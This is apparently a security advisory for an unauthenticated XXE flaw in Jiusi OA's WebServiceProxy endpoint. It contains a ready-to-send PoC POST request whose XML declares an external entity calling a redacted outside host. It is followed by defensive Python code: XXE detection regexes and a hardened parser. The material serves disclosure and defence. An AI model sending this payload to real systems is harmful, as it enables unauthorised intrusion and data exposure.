九思OA (Jiusi OA) WebServiceProxy Unauthenticated XML External Entity (XXE) Injection Vulnerability

Date: 2024-08-22 | Affected software: 九思OA WebServiceProxy | PoC: public

Vulnerability description

PoC

POST /portal/jsoa/WebServiceProxy HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 139
Referer: http://[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE aaa [<!ENTITY name SYSTEM "http://[REDACTED]/i/904437/3g4z/a3yv/" >]><name>&name;</name>
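The advisory gives nothing beyond the request above, so the following is an added defensive example, not part of the original advisory and not the vendor's code. It shows what a practitioner would want on the receiving side of such an endpoint: a classifier that flags XML bodies declaring a SYSTEM/PUBLIC entity (the exact shape of the PoC's DOCTYPE), and a hardened parse routine that refuses any DTD outright and additionally disables external entity loading in Python's expat-backed SAX parser. The sample bodies, the placeholder callback host `callback.invalid`, and all function names are constructed assumptions.

```python
import re
import xml.sax
from xml.sax import handler

# Constructed sample bodies (assumptions, not captured traffic). The first mirrors
# the shape of the PoC above with a reserved placeholder host; the second is benign.
XXE_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE aaa [<!ENTITY name SYSTEM "http://callback.invalid/x" >]>'
    '<name>&name;</name>'
)
BENIGN_BODY = '<?xml version="1.0" encoding="utf-8"?><name>hello</name>'

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Matches both general (<!ENTITY x SYSTEM ...) and parameter (<!ENTITY % x SYSTEM ...)
# entity declarations that point at an external resource.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def classify_xml_body(body: str) -> str:
    """Coarse detection suitable for a WAF rule or a log-review script.

    Returns 'external-entity' when a SYSTEM/PUBLIC entity is declared (the XXE
    pattern), 'doctype' when only an inline DTD is present, and 'clean' otherwise.
    Text inside comments or CDATA can produce a false positive; that is acceptable
    for an endpoint that never legitimately needs a DTD.
    """
    if EXTERNAL_ENTITY_RE.search(body):
        return "external-entity"
    if DOCTYPE_RE.search(body):
        return "doctype"
    return "clean"


class _TextCollector(handler.ContentHandler):
    """Collects character data so the caller can see what the parser produced."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_hardened(body: str) -> str:
    """Parse untrusted XML with DTDs rejected and external entity loading disabled.

    Two layers: refuse any DOCTYPE up front (a proxy call of this kind has no
    need for a DTD), and also turn off the SAX features that would otherwise let
    expat fetch external general or parameter entities if a DTD slipped through.
    """
    if DOCTYPE_RE.search(body):
        raise ValueError("DTD/DOCTYPE declarations are not accepted on this endpoint")
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)  # no external general entities
    parser.setFeature(handler.feature_external_pes, False)  # no external parameter entities
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.feed(body.encode("utf-8"))
    parser.close()
    return "".join(collector.parts)


def review_bodies(bodies):
    """Return {index: verdict}, the shape a batch log-review script would emit."""
    return {i: classify_xml_body(b) for i, b in enumerate(bodies)}


if __name__ == "__main__":
    print(review_bodies([XXE_BODY, BENIGN_BODY]))
    print(parse_hardened(BENIGN_BODY))
    try:
        parse_hardened(XXE_BODY)
    except ValueError as exc:
        print("rejected:", exc)
```

`classify_xml_body` is meant for triage over captured request bodies or access logs that retain POST data; `parse_hardened` is the shape of the fix an application owner would apply, since rejecting the DTD removes the entity declaration the PoC depends on regardless of which XML library sits behind the proxy.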